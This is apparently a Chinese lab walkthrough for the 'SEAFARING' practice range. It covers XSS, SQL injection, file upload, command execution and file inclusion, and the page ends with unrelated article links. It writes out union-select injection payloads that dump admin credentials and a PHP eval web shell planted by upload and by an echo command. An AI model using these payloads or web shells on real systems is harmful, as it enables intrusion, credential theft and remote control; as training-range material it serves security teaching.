当前位置: 首页 > news >正文

SEAFARING靶场漏洞攻略

寻找漏洞

一,我们打开页面

第一个漏洞

xss漏洞

1.在登录页面显示有弹窗

第二个漏洞

sql注入漏洞

1.在输入框的地方输入-1 union select 1,2,3#我们来查看他的回显点

2.查看数据库表名

-1 union select 1,database(),3#

3.查看表名

-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='test'#

4.查看admin中的列名

-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='test' and table_name='admin'#

5.查看账号密码

-1 union select 1,2,group_concat(user_id,user_name,user_pass) from admin#

6.成功登录进来

第三个漏洞

文件上传漏洞

1.我们登录进去往下滑有个上传文件我们上传一个1.php

<?php @eval($_POST['cmd']);?>

2.用蚁剑连接一下

第四个漏洞

命令执行漏洞

1.页面下方有一个执行框,输入ls查看

2.输入echo '<?php phpinfo();?>' > wff.php 访问wff.php

3.写入一句话木马,访问1.php

echo '<?php @eval($_POST['cmd']);?>' > 1.php

4.蚁剑连接

第五个漏洞

文件包含漏洞

1.在关于页面中发现存在文件包含漏洞

2.通过访问之前写入的wff.php查看,远程文件包含关闭,本地文件可以访问

3.访问1.php

4.蚁剑连接

相关文章:

  • Playwright与Selenium的对比:谁是更适合你的自动化测试工具?
  • 随想录笔记-二叉树练习题
  • 基于微信小程序的宠物之家的设计与实现
  • 基于R语言的统计分析基础:使用SQL语句操作数据集
  • Gitlab实现多项目触发式自动CICD
  • 2024年华为9月4日秋招笔试真题题解
  • 多态(下)【C++】
  • HarmonyOS开发之模拟器地图点击无效问题
  • 实现实时Web应用,使用AJAX轮询、WebSocket、还是SSE呢??
  • Java | Leetcode Java题解之第405题数字转换为十六进制数
  • python-素数对
  • C Primer Plus 第5章习题
  • TDengine 与飞腾腾锐 D2000 完成兼容互认证,推动国产软硬件深度融合
  • MS SQL Server 实战 排查多列之间的值是否重复
  • 【字幕】恋上数据结构与算法之014动态数组02接口设计
  • C# 在WPF中实现图表生成
  • Python-pptx:如何在幻灯片中轻松插入与填充表格
  • 【算法】滑动窗口—字符串的排列
  • QT多线程编程(基础概念以及示例)
  • 什么是CPU、GPU、NPU?(包懂+会)
  • “一码难求”的Manus开放注册但价格不菲,智能体距离“实用”还有多远
  • 字母哥动了离开的心思,他和雄鹿队的缘分早就到了头
  • 回望乡土:对媒介化社会的反思
  • 缺字危机:一本书背后有多少“不存在”的汉字?
  • 真人秀《幸存者》百万美元奖金,25年间“缩水”近一半
  • 工人日报:“鼠标手”被纳入职业病,劳动保障网越织越密